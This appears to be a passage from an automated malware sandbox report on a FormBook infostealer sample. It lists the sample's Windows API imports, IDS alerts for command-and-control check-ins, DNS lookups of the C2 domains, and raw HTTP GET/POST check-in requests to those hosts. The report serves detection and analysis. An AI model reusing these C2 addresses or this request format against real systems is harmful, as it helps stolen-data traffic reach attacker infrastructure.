                                                KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishGreat Britain

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2025-01-10T21:07:05.933875+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.7502553.33.130.19080TCP
                                                2025-01-10T21:07:26.470361+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7502563.33.130.19080TCP
                                                2025-01-10T21:07:29.036634+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7502573.33.130.19080TCP
                                                2025-01-10T21:07:31.571060+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7502583.33.130.19080TCP
                                                2025-01-10T21:07:34.215997+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.7502593.33.130.19080TCP
                                                2025-01-10T21:07:48.290034+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7502608.217.17.19280TCP
                                                2025-01-10T21:07:50.866665+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7502618.217.17.19280TCP
                                                2025-01-10T21:07:53.386866+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7502628.217.17.19280TCP
                                                2025-01-10T21:07:56.497863+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.7502638.217.17.19280TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 10, 2025 21:06:55.311851978 CET5025053192.168.2.7162.159.36.2
                                                Jan 10, 2025 21:06:55.316732883 CET5350250162.159.36.2192.168.2.7
                                                Jan 10, 2025 21:06:55.316890001 CET5025053192.168.2.7162.159.36.2
                                                Jan 10, 2025 21:06:55.321872950 CET5350250162.159.36.2192.168.2.7
                                                Jan 10, 2025 21:06:55.831964016 CET5025053192.168.2.7162.159.36.2
                                                Jan 10, 2025 21:06:55.837405920 CET5350250162.159.36.2192.168.2.7
                                                Jan 10, 2025 21:06:55.837507963 CET5025053192.168.2.7162.159.36.2
                                                Jan 10, 2025 21:07:04.511502981 CET5025580192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:04.696399927 CET80502553.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:04.696511984 CET5025580192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:04.713511944 CET5025580192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:04.719037056 CET80502553.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:05.933609009 CET80502553.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:05.933621883 CET80502553.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:05.933875084 CET5025580192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:05.935020924 CET80502553.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:05.935055017 CET80502553.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:05.935064077 CET5025580192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:05.935079098 CET80502553.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:05.935116053 CET5025580192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:05.937205076 CET5025580192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:05.937205076 CET5025580192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:05.958192110 CET80502553.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:26.010118961 CET5025680192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:26.014940023 CET80502563.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:26.015017986 CET5025680192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:26.025995016 CET5025680192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:26.030796051 CET80502563.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:26.470170021 CET80502563.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:26.470305920 CET80502563.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:26.470360994 CET5025680192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:27.538597107 CET5025680192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:28.561544895 CET5025780192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:28.566653013 CET80502573.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:28.566756010 CET5025780192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:28.581547976 CET5025780192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:28.586369991 CET80502573.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:29.036501884 CET80502573.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:29.036524057 CET80502573.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:29.036633968 CET5025780192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:30.085231066 CET5025780192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:31.104824066 CET5025880192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:31.109909058 CET80502583.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:31.110013008 CET5025880192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:31.124914885 CET5025880192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:31.129863977 CET80502583.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:31.129954100 CET80502583.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:31.570842028 CET80502583.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:31.570873976 CET80502583.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:31.571059942 CET5025880192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:32.632148981 CET5025880192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:33.651678085 CET5025980192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:33.656586885 CET80502593.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:33.656650066 CET5025980192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:33.665636063 CET5025980192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:33.670459032 CET80502593.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:34.215807915 CET80502593.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:34.215825081 CET80502593.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:34.215836048 CET80502593.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:34.215996981 CET5025980192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:34.219747066 CET5025980192.168.2.73.33.130.190
                                                Jan 10, 2025 21:07:34.224559069 CET80502593.33.130.190192.168.2.7
                                                Jan 10, 2025 21:07:47.365675926 CET5026080192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:47.370520115 CET80502608.217.17.192192.168.2.7
                                                Jan 10, 2025 21:07:47.370594025 CET5026080192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:47.382741928 CET5026080192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:47.387625933 CET80502608.217.17.192192.168.2.7
                                                Jan 10, 2025 21:07:48.289911985 CET80502608.217.17.192192.168.2.7
                                                Jan 10, 2025 21:07:48.289966106 CET80502608.217.17.192192.168.2.7
                                                Jan 10, 2025 21:07:48.290034056 CET5026080192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:48.897829056 CET5026080192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:49.919064045 CET5026180192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:49.924061060 CET80502618.217.17.192192.168.2.7
                                                Jan 10, 2025 21:07:49.924166918 CET5026180192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:49.937206984 CET5026180192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:49.942230940 CET80502618.217.17.192192.168.2.7
                                                Jan 10, 2025 21:07:50.866570950 CET80502618.217.17.192192.168.2.7
                                                Jan 10, 2025 21:07:50.866589069 CET80502618.217.17.192192.168.2.7
                                                Jan 10, 2025 21:07:50.866664886 CET5026180192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:51.444547892 CET5026180192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:52.467340946 CET5026280192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:52.472510099 CET80502628.217.17.192192.168.2.7
                                                Jan 10, 2025 21:07:52.476746082 CET5026280192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:52.487870932 CET5026280192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:52.492788076 CET80502628.217.17.192192.168.2.7
                                                Jan 10, 2025 21:07:52.492846966 CET80502628.217.17.192192.168.2.7
                                                Jan 10, 2025 21:07:53.386699915 CET80502628.217.17.192192.168.2.7
                                                Jan 10, 2025 21:07:53.386795044 CET80502628.217.17.192192.168.2.7
                                                Jan 10, 2025 21:07:53.386866093 CET5026280192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:53.991416931 CET5026280192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:55.593588114 CET5026380192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:55.598491907 CET80502638.217.17.192192.168.2.7
                                                Jan 10, 2025 21:07:55.598997116 CET5026380192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:55.606630087 CET5026380192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:55.611419916 CET80502638.217.17.192192.168.2.7
                                                Jan 10, 2025 21:07:56.497524023 CET80502638.217.17.192192.168.2.7
                                                Jan 10, 2025 21:07:56.497565985 CET80502638.217.17.192192.168.2.7
                                                Jan 10, 2025 21:07:56.497863054 CET5026380192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:56.500451088 CET5026380192.168.2.78.217.17.192
                                                Jan 10, 2025 21:07:56.505187988 CET80502638.217.17.192192.168.2.7

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 10, 2025 21:06:55.310641050 CET5353759162.159.36.2192.168.2.7
                                                Jan 10, 2025 21:06:55.906732082 CET53635091.1.1.1192.168.2.7
                                                Jan 10, 2025 21:07:04.296108007 CET5998753192.168.2.71.1.1.1
                                                Jan 10, 2025 21:07:04.430181026 CET53599871.1.1.1192.168.2.7
                                                Jan 10, 2025 21:07:25.995064974 CET6218253192.168.2.71.1.1.1
                                                Jan 10, 2025 21:07:26.007814884 CET53621821.1.1.1192.168.2.7
                                                Jan 10, 2025 21:07:39.234316111 CET5805853192.168.2.71.1.1.1
                                                Jan 10, 2025 21:07:39.243407965 CET53580581.1.1.1192.168.2.7
                                                Jan 10, 2025 21:07:47.324507952 CET6039653192.168.2.71.1.1.1
                                                Jan 10, 2025 21:07:47.363164902 CET53603961.1.1.1192.168.2.7

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jan 10, 2025 21:07:04.296108007 CET192.168.2.71.1.1.10x5205Standard query (0)www.arcare.partnersA (IP address)IN (0x0001)false
                                                Jan 10, 2025 21:07:25.995064974 CET192.168.2.71.1.1.10xcc2Standard query (0)www.medicaresbasics.xyzA (IP address)IN (0x0001)false
                                                Jan 10, 2025 21:07:39.234316111 CET192.168.2.71.1.1.10xf465Standard query (0)www.resellnexa.shopA (IP address)IN (0x0001)false
                                                Jan 10, 2025 21:07:47.324507952 CET192.168.2.71.1.1.10xd816Standard query (0)www.meliorahomes.netA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jan 10, 2025 21:07:04.430181026 CET1.1.1.1192.168.2.70x5205No error (0)www.arcare.partnersarcare.partnersCNAME (Canonical name)IN (0x0001)false
                                                Jan 10, 2025 21:07:04.430181026 CET1.1.1.1192.168.2.70x5205No error (0)arcare.partners3.33.130.190A (IP address)IN (0x0001)false
                                                Jan 10, 2025 21:07:04.430181026 CET1.1.1.1192.168.2.70x5205No error (0)arcare.partners15.197.148.33A (IP address)IN (0x0001)false
                                                Jan 10, 2025 21:07:26.007814884 CET1.1.1.1192.168.2.70xcc2No error (0)www.medicaresbasics.xyzmedicaresbasics.xyzCNAME (Canonical name)IN (0x0001)false
                                                Jan 10, 2025 21:07:26.007814884 CET1.1.1.1192.168.2.70xcc2No error (0)medicaresbasics.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                Jan 10, 2025 21:07:26.007814884 CET1.1.1.1192.168.2.70xcc2No error (0)medicaresbasics.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                Jan 10, 2025 21:07:39.243407965 CET1.1.1.1192.168.2.70xf465Name error (3)www.resellnexa.shopnonenoneA (IP address)IN (0x0001)false
                                                Jan 10, 2025 21:07:47.363164902 CET1.1.1.1192.168.2.70xd816No error (0)www.meliorahomes.net8.217.17.192A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • www.arcare.partners
                                                • www.medicaresbasics.xyz
                                                • www.meliorahomes.net

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.7502553.33.130.190807088C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 21:07:04.713511944 CET521OUTGET /0w45/?A2jpdtl=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LRAA95+SEq5JDEdJFd3pplmYx68eY/xBqA0qg2DYtg7eqCiJgDt7nHqi&7pG=BhQ41 HTTP/1.1
                                                Host: www.arcare.partners
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                Jan 10, 2025 21:07:05.933609009 CET394INHTTP/1.1 200 OK
                                                content-type: text/html
                                                date: Fri, 10 Jan 2025 20:07:05 GMT
                                                content-length: 273
                                                connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 32 6a 70 64 74 6c 3d 59 68 39 54 4b 6d 7a 52 50 6c 36 30 48 63 75 47 33 51 2f 50 30 45 68 5a 70 78 6c 77 41 38 2b 58 75 47 30 76 46 68 63 4d 41 53 56 2f 57 2f 61 2b 64 53 4a 52 73 7a 72 56 43 45 31 76 72 79 4e 39 57 78 48 48 46 31 5a 66 74 51 43 31 34 31 5a 2f 2f 46 6b 36 4c 52 41 41 39 35 2b 53 45 71 35 4a 44 45 64 4a 46 64 33 70 70 6c 6d 59 78 36 38 65 59 2f 78 42 71 41 30 71 67 32 44 59 74 67 37 65 71 43 69 4a 67 44 74 37 6e 48 71 69 26 37 70 47 3d 42 68 51 34 31 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A2jpdtl=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LRAA95+SEq5JDEdJFd3pplmYx68eY/xBqA0qg2DYtg7eqCiJgDt7nHqi&7pG=BhQ41"}</script></head></html>
                                                Jan 10, 2025 21:07:05.935055017 CET394INHTTP/1.1 200 OK
                                                content-type: text/html
                                                date: Fri, 10 Jan 2025 20:07:05 GMT
                                                content-length: 273
                                                connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 32 6a 70 64 74 6c 3d 59 68 39 54 4b 6d 7a 52 50 6c 36 30 48 63 75 47 33 51 2f 50 30 45 68 5a 70 78 6c 77 41 38 2b 58 75 47 30 76 46 68 63 4d 41 53 56 2f 57 2f 61 2b 64 53 4a 52 73 7a 72 56 43 45 31 76 72 79 4e 39 57 78 48 48 46 31 5a 66 74 51 43 31 34 31 5a 2f 2f 46 6b 36 4c 52 41 41 39 35 2b 53 45 71 35 4a 44 45 64 4a 46 64 33 70 70 6c 6d 59 78 36 38 65 59 2f 78 42 71 41 30 71 67 32 44 59 74 67 37 65 71 43 69 4a 67 44 74 37 6e 48 71 69 26 37 70 47 3d 42 68 51 34 31 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A2jpdtl=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LRAA95+SEq5JDEdJFd3pplmYx68eY/xBqA0qg2DYtg7eqCiJgDt7nHqi&7pG=BhQ41"}</script></head></html>
                                                Jan 10, 2025 21:07:05.935079098 CET394INHTTP/1.1 200 OK
                                                content-type: text/html
                                                date: Fri, 10 Jan 2025 20:07:05 GMT
                                                content-length: 273
                                                connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 32 6a 70 64 74 6c 3d 59 68 39 54 4b 6d 7a 52 50 6c 36 30 48 63 75 47 33 51 2f 50 30 45 68 5a 70 78 6c 77 41 38 2b 58 75 47 30 76 46 68 63 4d 41 53 56 2f 57 2f 61 2b 64 53 4a 52 73 7a 72 56 43 45 31 76 72 79 4e 39 57 78 48 48 46 31 5a 66 74 51 43 31 34 31 5a 2f 2f 46 6b 36 4c 52 41 41 39 35 2b 53 45 71 35 4a 44 45 64 4a 46 64 33 70 70 6c 6d 59 78 36 38 65 59 2f 78 42 71 41 30 71 67 32 44 59 74 67 37 65 71 43 69 4a 67 44 74 37 6e 48 71 69 26 37 70 47 3d 42 68 51 34 31 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A2jpdtl=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LRAA95+SEq5JDEdJFd3pplmYx68eY/xBqA0qg2DYtg7eqCiJgDt7nHqi&7pG=BhQ41"}</script></head></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.7502563.33.130.190807088C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 21:07:26.025995016 CET805OUTPOST /fm31/ HTTP/1.1
                                                Host: www.medicaresbasics.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Origin: http://www.medicaresbasics.xyz
                                                Referer: http://www.medicaresbasics.xyz/fm31/
                                                Cache-Control: no-cache
                                                Content-Length: 220
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
